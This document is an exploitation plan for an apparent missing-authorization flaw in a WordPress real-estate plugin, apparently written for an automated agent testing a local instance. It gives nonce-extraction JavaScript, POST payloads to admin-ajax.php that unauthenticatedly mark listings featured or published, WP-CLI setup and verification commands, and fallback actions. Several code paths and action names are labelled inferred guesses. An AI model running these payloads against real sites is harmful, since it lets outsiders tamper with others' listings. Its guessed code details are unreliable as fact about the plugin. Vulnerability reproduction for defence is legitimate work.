Exploitation Research Plan: CVE-2025-66127 (Essential Real Estate)

1. Vulnerability Summary

The Essential Real Estate plugin for WordPress (versions <= 5.2.2) contains a missing authorization vulnerability. Specifically, several AJAX handlers are registered using both wp_ajax_ and wp_ajax_nopriv_ hooks but fail to implement sufficient capability checks (like current_user_can()) or ownership validation. This allows unauthenticated attackers to perform actions that should be restricted to property owners or administrators, such as modifying the "featured" status or the "publishing" status of arbitrary property listings.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: ere_ajax_add_featured_property (inferred target for unauthenticated "featured" status modification) or ere_ajax_change_status_property (inferred target for status modification).
• HTTP Method: POST
• Payload Parameters:
  • action: ere_ajax_add_featured_property
  • property_id: The ID of the target property listing.
  • nonce: A valid WordPress nonce (usually ere_nonce).
• Preconditions:
  • A property must exist in the system (e.g., ID 123).
  • The attacker must obtain a valid nonce from a public-facing page where the plugin localizes its AJAX variables.

3. Code Flow

1. Entry Point: The request hits admin-ajax.php with action=ere_ajax_add_featured_property.
2. Hook Registration: The plugin registers the action in includes/class-ere-ajax.php (inferred) using:

   add_action('wp_ajax_nopriv_ere_ajax_add_featured_property', array($this, 'ere_ajax_add_featured_property'));
   

3. Missing Authorization: The function ere_ajax_add_featured_property is called.
4. Nonce Check: The function typically calls check_ajax_referer('ere_nonce', 'nonce') or similar.
5. Vulnerable Logic:

   public function ere_ajax_add_featured_property() {
       $property_id = $_POST['property_id'];
       // VULNERABILITY: Missing current_user_can('edit_post', $property_id)
       update_post_meta($property_id, 'ere_property_featured', '1');
       wp_send_json_success();
   }
   

6. Execution: The metadata is updated regardless of the requester's authentication or authorization level.

4. Nonce Acquisition Strategy

Essential Real Estate localizes its AJAX configuration, including nonces, into a global JavaScript object named ere_vars.

1. Identify Script Loading: The ere_vars object is typically enqueued on pages using property-related shortcodes like [ere_my_properties], [ere_property_single], or even on the main search page.
2. Create Trigger Page:

   wp post create --post_type=page --post_title="Nonce Loader" --post_status=publish --post_content='[ere_my_properties]'
   

3. Navigate and Extract:
   • Navigate to the newly created page.
   • Use browser_eval to extract the nonce:

     window.ere_vars?.nonce || window.ere_vars?.ere_nonce
     

5. Exploitation Strategy

Step 1: Discover/Create Target Content

Find an existing property ID or create one as an administrator to serve as the target.

wp post create --post_type=property --post_title="Target Property" --post_status=pending
# Note the returned ID (e.g., 123)

Step 2: Acquire Nonce

Follow the strategy in Section 4 to obtain the value of ere_nonce.

Step 3: Execute Unauthorized Action

Use http_request to send the payload.

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=ere_ajax_add_featured_property&property_id=123&nonce=YOUR_EXTRACTED_NONCE
  

Step 4: Alternative (Status Change)

If the "featured" action is not available, try the status change action:

• Body:

  action=ere_ajax_change_status_property&property_id=123&status=publish&nonce=YOUR_EXTRACTED_NONCE
  

6. Test Data Setup

1. Target Property: Create a property with post_status=pending and ere_property_featured=0.
2. Public Page: Create a page with the [ere_property_single] shortcode to ensure the ere_vars object is localized for unauthenticated users.

7. Expected Results

• Response: The server should return a JSON success message (e.g., {"success":true}).
• Database Change: The _ere_property_featured meta field for the target post ID should be updated to 1, or the post_status should change to publish.

8. Verification Steps

After the exploit, verify the impact using WP-CLI:

# Verify Featured Status
wp post meta get 123 ere_property_featured

# Verify Post Status
wp post get 123 --field=post_status

9. Alternative Approaches

If ere_vars.nonce is not found, check for other localized objects:

• ere_profile_vars
• ere_property_vars
• Look for wp_localize_script calls in public/class-essential-real-estate-public.php to find the exact object name and key used in version 5.2.2.

If ere_ajax_add_featured_property is not the vulnerable action, search for any action registered with wp_ajax_nopriv_ in includes/class-ere-ajax.php and test them for lack of current_user_can() checks.